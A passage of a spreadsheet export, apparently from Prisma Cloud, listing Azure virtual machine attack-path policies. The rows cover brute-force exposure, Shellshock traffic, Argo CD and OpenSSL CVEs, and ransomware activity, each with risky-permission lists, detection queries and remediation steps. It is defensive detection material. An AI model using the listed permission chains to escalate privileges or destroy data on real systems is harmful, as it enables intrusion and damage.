      <c r="AK2559" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2560">
      <c r="A2560" t="inlineStr"/>
      <c r="B2560" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2560" s="2" t="inlineStr"/>
      <c r="D2560" t="inlineStr"/>
      <c r="E2560" t="inlineStr"/>
      <c r="F2560" t="inlineStr"/>
      <c r="G2560" t="b">
        <v>1</v>
      </c>
      <c r="H25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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2560" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2560" t="inlineStr">
        <is>
          <t>Brute force attack risk on a publicly exposed Azure Virtual Machine with risky storage account permissions</t>
        </is>
      </c>
      <c r="L2560" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2560" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2560" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2560" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2560" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2560" t="inlineStr"/>
      <c r="R2560" t="inlineStr"/>
      <c r="S2560" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2560" t="b">
        <v>0</v>
      </c>
      <c r="U2560" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2560" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2560" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed, use basic authentication instead of SSH keys, and have risky Storage account permissions.
Publicly exposed Azure Virtual Machine with basic authentication enable bad actors to use brute force on a system to gain unauthorized access. Storage accounts might hold sensitive information, publicly exposed, and vulnerable VM having write permission on such storage accounts can damage or exfiltrate data that can adversely affect organizations.
This policy checks for the following risky permissions:
'Microsoft.Storage/storageAccounts/write', 'Microsoft.Storage/storageAccounts/listKeys/action', 'Microsoft.Storage/storageAccounts/regeneratekey/action', 'Microsoft.Storage/storageAccounts/delete', 'Microsoft.Storage/storageAccounts/ListAccountSas/action'
Immediate attention is required to grant the least privileges and remove unwanted risky permissions assigned to the Virtual Machine, ensure Azure Virtual Machine uses SSH Key authentication instead of basic authentication, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X256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60" t="inlineStr"/>
      <c r="Z2560" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure Virtual Machine (Linux) does not authenticate using SSH keys','Azure VM instance with risky Storage account permissions')</t>
        </is>
      </c>
      <c r="AA2560" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2560" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:03</t>
        </is>
      </c>
      <c r="AC2560" t="inlineStr"/>
      <c r="AD2560" t="b">
        <v>1</v>
      </c>
      <c r="AE2560" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2560" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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0" t="inlineStr">
        <is>
          <t>d2f005df-39a2-4d25-ad91-3a6ccbb4edc9</t>
        </is>
      </c>
      <c r="AI2560" t="inlineStr">
        <is>
          <t>4495ccd8-db21-4926-8d0a-5f556da14747</t>
        </is>
      </c>
      <c r="AJ2560" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2560" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2561">
      <c r="A2561" t="inlineStr"/>
      <c r="B2561" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2561" s="2" t="inlineStr"/>
      <c r="D2561" t="inlineStr"/>
      <c r="E2561" t="inlineStr"/>
      <c r="F2561" t="inlineStr"/>
      <c r="G2561" t="b">
        <v>1</v>
      </c>
      <c r="H25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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2561" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2561" t="inlineStr">
        <is>
          <t>Data destruction risk due to a publicly exposed and vulnerable Azure Virtual Machine instance with data destruction permissions</t>
        </is>
      </c>
      <c r="L2561" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2561" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2561" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2561" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2561" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2561" t="inlineStr"/>
      <c r="R2561" t="inlineStr"/>
      <c r="S2561" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2561" t="b">
        <v>0</v>
      </c>
      <c r="U2561" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2561" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2561" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which are publicly exposed with critical or high vulnerabilities and data destruction permissions.
Data destruction permissions on publicly exposed virtual machines with critical or high vulnerabilities may allow an attacker to gain access to the vulnerable virtual machines and leverage that access to delete cloud storage buckets, snapshots and images and destroy sensitive information stored in your cloud resources making irreversible damage to your organization.
This policy checks for the following data destruction permissions:
'Microsoft.Compute/disks/delete', 'Microsoft.Compute/virtualMachines/delete', 'Microsoft.Compute/images/delete', 'Microsoft.DBforMySQL/servers/delete', 'Microsoft.Sql/servers/delete', 'Microsoft.Storage/storageAccounts/delete'
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the virtual machine. Remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2561"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61" t="inlineStr"/>
      <c r="Z2561" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure VM instance with data destruction permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2561" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2561" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2561" t="inlineStr"/>
      <c r="AD2561" t="b">
        <v>1</v>
      </c>
      <c r="AE2561" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2561" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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1" t="inlineStr">
        <is>
          <t>76a96532-db27-4834-9385-c1ac14a0bf04</t>
        </is>
      </c>
      <c r="AI2561" t="inlineStr">
        <is>
          <t>2589bb3d-feff-4ab8-bf62-edccb480d4ae</t>
        </is>
      </c>
      <c r="AJ2561" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2561" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2562">
      <c r="A2562" t="inlineStr"/>
      <c r="B2562" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2562" s="2" t="inlineStr"/>
      <c r="D2562" t="inlineStr"/>
      <c r="E2562" t="inlineStr"/>
      <c r="F2562" t="inlineStr"/>
      <c r="G2562" t="b">
        <v>1</v>
      </c>
      <c r="H25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62" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2562" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2562" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to unencrypted sensitive data transmission detected on Azure virtual machine with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L2562" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2562" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2562" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2562" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2562" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2562" t="inlineStr"/>
      <c r="R2562" t="inlineStr"/>
      <c r="S2562" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2562" t="b">
        <v>0</v>
      </c>
      <c r="U2562" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2562" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2562" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines with unencrypted sensitive data transmission detected and having permissions that could potentially lead to privilege escalation.
Unencrypted sensitive data transmission via API endpoint exposed to internet includes potential unauthorized access and exploitation. When combined with elevated virtual machine permissions and sensitive data/credentials transmission, attackers can escalate privileges, gain control over resources, and execute malicious actions within the environment.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review the API endpoint traffic on the server, add the WAAS rule to prevent this activity, review and remove unwanted permissions assigned to the Virtual Machine.</t>
        </is>
      </c>
      <c r="X256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t>
        </is>
      </c>
      <c r="Y2562" t="inlineStr"/>
      <c r="Z2562" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'azure-vm-list' ) and finding.name contains all ('Sensitive data sent via API endpoint exposed to internet without encryption','Azure VM associated with entities that have risky permissions')</t>
        </is>
      </c>
      <c r="AA2562" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2562" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:58</t>
        </is>
      </c>
      <c r="AC2562" t="inlineStr"/>
      <c r="AD2562" t="b">
        <v>1</v>
      </c>
      <c r="AE2562" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2562" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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62" t="inlineStr">
        <is>
          <t>357b119f-632a-4dd3-8c26-1ac7a6921fae</t>
        </is>
      </c>
      <c r="AI2562" t="inlineStr">
        <is>
          <t>55bbdfc7-1da2-4d3a-b9a7-14285a77909a</t>
        </is>
      </c>
      <c r="AJ2562" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2562" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2563">
      <c r="A2563" t="inlineStr"/>
      <c r="B2563" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2563" s="2" t="inlineStr"/>
      <c r="D2563" t="inlineStr"/>
      <c r="E2563" t="inlineStr"/>
      <c r="F2563" t="inlineStr"/>
      <c r="G2563" t="b">
        <v>1</v>
      </c>
      <c r="H25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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2563" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2563" t="inlineStr">
        <is>
          <t>Brute force attack risk on a publicly exposed Azure Virtual Machine with data destruction permissions</t>
        </is>
      </c>
      <c r="L2563" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2563" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2563" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2563" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2563" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2563" t="inlineStr"/>
      <c r="R2563" t="inlineStr"/>
      <c r="S2563" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2563" t="b">
        <v>0</v>
      </c>
      <c r="U2563" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2563" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2563" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed, use basic authentication instead of SSH keys, and have data destruction permissions.
Publicly exposed Azure Virtual Machine with basic authentication enables bad actors to use brute force on a system to gain unauthorized access. Data destruction permissions on publicly exposed virtual machines with basic authentication may allow an attacker to gain access to the instance and leverage that access to delete cloud storage buckets, snapshots, and images and destroy sensitive information stored in your cloud resources causing irreversible damage to your organization.
This policy checks for the following data destruction permissions:
'Microsoft.Compute/disks/delete', 'Microsoft.Compute/virtualMachines/delete', 'Microsoft.Compute/images/delete', 'Microsoft.DBforMySQL/servers/delete', 'Microsoft.Sql/servers/delete', 'Microsoft.Storage/storageAccounts/delete'.
Immediate attention is required to grant the least privileges and remove unwanted risky permissions assigned to the Virtual Machine, ensure Azure Virtual Machine uses SSH Key authentication instead of basic authentication, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2563"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63" t="inlineStr"/>
      <c r="Z2563" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure Virtual Machine (Linux) does not authenticate using SSH keys','Azure VM instance with data destruction permissions')</t>
        </is>
      </c>
      <c r="AA2563" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2563" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:03</t>
        </is>
      </c>
      <c r="AC2563" t="inlineStr"/>
      <c r="AD2563" t="b">
        <v>1</v>
      </c>
      <c r="AE2563" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2563" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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3" t="inlineStr">
        <is>
          <t>3c844e0d-b2a6-4e04-bba3-516c303f2162</t>
        </is>
      </c>
      <c r="AI2563" t="inlineStr">
        <is>
          <t>d0b343f3-43ff-43e6-a4ee-f76c5fdd9536</t>
        </is>
      </c>
      <c r="AJ2563" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2563" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2564">
      <c r="A2564" t="inlineStr"/>
      <c r="B2564" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2564" s="2" t="inlineStr"/>
      <c r="D2564" t="inlineStr"/>
      <c r="E2564" t="inlineStr"/>
      <c r="F2564" t="inlineStr"/>
      <c r="G2564" t="b">
        <v>1</v>
      </c>
      <c r="H256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64" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2564" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2564" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to Shellshock payload detected on traffic targetting a vulnerable Azure Virtual Machine with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L2564" t="inlineStr">
        <is>
          <t>WEB_ATTACK,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2564" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2564" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2564" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2564" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2564" t="inlineStr"/>
      <c r="R2564" t="inlineStr"/>
      <c r="S2564" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2564" t="b">
        <v>0</v>
      </c>
      <c r="U2564" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2564" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2564" t="inlineStr">
        <is>
          <t>This policy identifies vulnerable Azure Virtual Machines with Shellshock payload detected in the traffic and having permissions that could potentially lead to privilege escalation.
Shellshock vulnerability allows attackers to execute arbitrary code on a vulnerable system by exploiting how Bash processes environment variables. When combined with elevated virtual machine permissions and Shellshock vulnerability payload in the traffic, attackers can escalate privileges, gain control over resources, and execute malicious actions within the environment.
This policy checks for the following risky permissions:
'Microsoft.AzureActiveDirectory/b2cDirectories/write','Microsoft.ManagedIdentity/userAssignedIdentities/write','Microsoft.ManagedIdentity/userAssignedIdentities/assign/action','Microsoft.KeyVault/vaults/read','Microsoft.KeyVault/vaults/write','Microsoft.KeyVault/vaults/deploy/action','Microsoft.KeyVault/vaults/accessPolicies/write','Microsoft.Authorization/roleDefinitions/write','Microsoft.Authorization/roleAssignments/write','Microsoft.Authorization/policySetDefinitions/write','Microsoft.Authorization/policyExemptions/write','Microsoft.Authorization/policyDefinitions/write','Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/privateEndpointConnections/write','Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/privateEndpointConnectionProxies/write','Microsoft.Authorization/policyAssignments/resourceManagementPrivateLinks/write','Microsoft.Authorization/policyAssignments/privateLinkAssociations/write','Microsoft.Authorization/policyAssignments/write','Microsoft.Authorization/locks/write','Microsoft.Authorization/denyAssignments/write','Microsoft.Authorization/classicAdministrators/write'
Immediate attention is required to review the VM traffic, add the WAAS rule to prevent this activity, remediate critical and high vulnerabilities, and remove unwanted permissions assigned to the VM instance.</t>
        </is>
      </c>
      <c r="X256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564" t="inlineStr"/>
      <c r="Z2564" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'azure-vm-list' ) and finding.name contains all ('Shellshock payload detected in HTTP traffic','Azure VM associated with entities that have risky permissions') AND with : ( Vuln WHERE severity greater than or equal to high )</t>
        </is>
      </c>
      <c r="AA2564" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2564" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:56</t>
        </is>
      </c>
      <c r="AC2564" t="inlineStr"/>
      <c r="AD2564" t="b">
        <v>1</v>
      </c>
      <c r="AE2564" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2564" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG256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64" t="inlineStr">
        <is>
          <t>afc72456-7cd9-48ed-98bc-fce4e1fe8b5b</t>
        </is>
      </c>
      <c r="AI2564" t="inlineStr">
        <is>
          <t>382365fe-9820-4789-8f22-5813c1652839</t>
        </is>
      </c>
      <c r="AJ2564" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2564" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2565">
      <c r="A2565" t="inlineStr"/>
      <c r="B2565" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2565" s="2" t="inlineStr"/>
      <c r="D2565" t="inlineStr"/>
      <c r="E2565" t="inlineStr"/>
      <c r="F2565" t="inlineStr"/>
      <c r="G2565" t="b">
        <v>1</v>
      </c>
      <c r="H25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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2565" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2565" t="inlineStr">
        <is>
          <t>Sensitive data exposure risk due to publicly exposed and vulnerable Azure Virtual Machine (Argo CD, CVE-2022-24348)</t>
        </is>
      </c>
      <c r="L2565" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2565" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2565" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2565" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2565" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2565" t="inlineStr"/>
      <c r="R2565" t="inlineStr"/>
      <c r="S2565" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2565" t="b">
        <v>0</v>
      </c>
      <c r="U2565" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2565" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2565" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Sensitive data exposure vulnerability (CVE-2022-24348).
Sensitive data exposure vulnerability would allow an attacker to access sensitive information such as secrets, passwords, and API keys. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Successful exploitation of the Argo CD Sensitive data exposure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Argo CD (CVE-2022-24348) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X256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CVE-2022-24348
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-24348</t>
        </is>
      </c>
      <c r="Y2565" t="inlineStr"/>
      <c r="Z2565" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-24348'))</t>
        </is>
      </c>
      <c r="AA2565" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2565" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:07</t>
        </is>
      </c>
      <c r="AC2565" t="inlineStr"/>
      <c r="AD2565" t="b">
        <v>1</v>
      </c>
      <c r="AE2565" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2565" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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5" t="inlineStr">
        <is>
          <t>1e66b7a7-205a-4fed-9a6f-80df9fbc2eff</t>
        </is>
      </c>
      <c r="AI2565" t="inlineStr">
        <is>
          <t>a0120028-f36b-4005-81e3-03d4627408d4</t>
        </is>
      </c>
      <c r="AJ2565" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2565" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2566">
      <c r="A2566" t="inlineStr"/>
      <c r="B2566" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2566" s="2" t="inlineStr"/>
      <c r="D2566" t="inlineStr"/>
      <c r="E2566" t="inlineStr"/>
      <c r="F2566" t="inlineStr"/>
      <c r="G2566" t="b">
        <v>1</v>
      </c>
      <c r="H25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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2566" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2566" t="inlineStr">
        <is>
          <t>Privilege Escalation risk due to publicly exposed and vulnerable Azure Virtual Machine [OpenSSL, CVE-2022-3786]</t>
        </is>
      </c>
      <c r="L2566" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2566" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2566" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2566" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2566" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2566" t="inlineStr"/>
      <c r="R2566" t="inlineStr"/>
      <c r="S2566" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2566" t="b">
        <v>0</v>
      </c>
      <c r="U2566" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2566" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2566" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2022-3786].
Privilege escalation vulnerability is a security flaw allowing a user to gain unauthorized elevated system access. Exploiting this vulnerability compromises system security, enabling unauthorized data access or manipulation. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the OpenSSL [CVE-2022-3786] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X256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CVE-2022-3786
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-3786</t>
        </is>
      </c>
      <c r="Y2566" t="inlineStr"/>
      <c r="Z2566" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-3786'))</t>
        </is>
      </c>
      <c r="AA2566" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2566" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2566" t="inlineStr"/>
      <c r="AD2566" t="b">
        <v>1</v>
      </c>
      <c r="AE2566" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2566" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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6" t="inlineStr">
        <is>
          <t>19ceb3e2-7cf2-4009-9f67-46c7f45f543a</t>
        </is>
      </c>
      <c r="AI2566" t="inlineStr">
        <is>
          <t>24a955e9-5ab0-49d6-bdf1-57bc63de1630</t>
        </is>
      </c>
      <c r="AJ2566" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2566" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2567">
      <c r="A2567" t="inlineStr"/>
      <c r="B2567" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2567" s="2" t="inlineStr"/>
      <c r="D2567" t="inlineStr"/>
      <c r="E2567" t="inlineStr"/>
      <c r="F2567" t="inlineStr"/>
      <c r="G2567" t="b">
        <v>1</v>
      </c>
      <c r="H25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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2567" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2567" t="inlineStr">
        <is>
          <t>Potentially nefarious ransomware activity detected on Azure Virtual machine with public serial console access</t>
        </is>
      </c>
      <c r="L2567" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,MALWARE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2567" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2567" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2567" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2567" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2567" t="inlineStr"/>
      <c r="R2567" t="inlineStr"/>
      <c r="S2567" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2567" t="b">
        <v>0</v>
      </c>
      <c r="U2567" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2567" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2567" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that have public serial console access and are connected with remote systems known for ransomware activities.
Public serial console access on Azure Virtual machine could allow malicious actors to remotely exploit and get initial access to the instance. Ransomware is a type of malware that prevents users from accessing their system or personal files and demands ransom payment in order to regain access.
Immediate attention is required to investigate ransomware activities, disable/restrict serial console permissions, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2567" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
1. Log in to the Azure portal
2. Navigate to Virtual machines
3. Click on the reported Virtual machine
4. Under Help section, Click on 'Boot diagnostics'
5. Click on 'Settings'
6. Set Status to 'Disable'
7. Clcik on Apply to save your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567" t="inlineStr"/>
      <c r="Z2567" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Azure Virtual machine configured with public IP and serial console access') and ('Traffic from a suspicious IP address associated with Ransomware activity' or 'Traffic to a suspicious IP address associated with Ransomware activity'))</t>
        </is>
      </c>
      <c r="AA2567" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
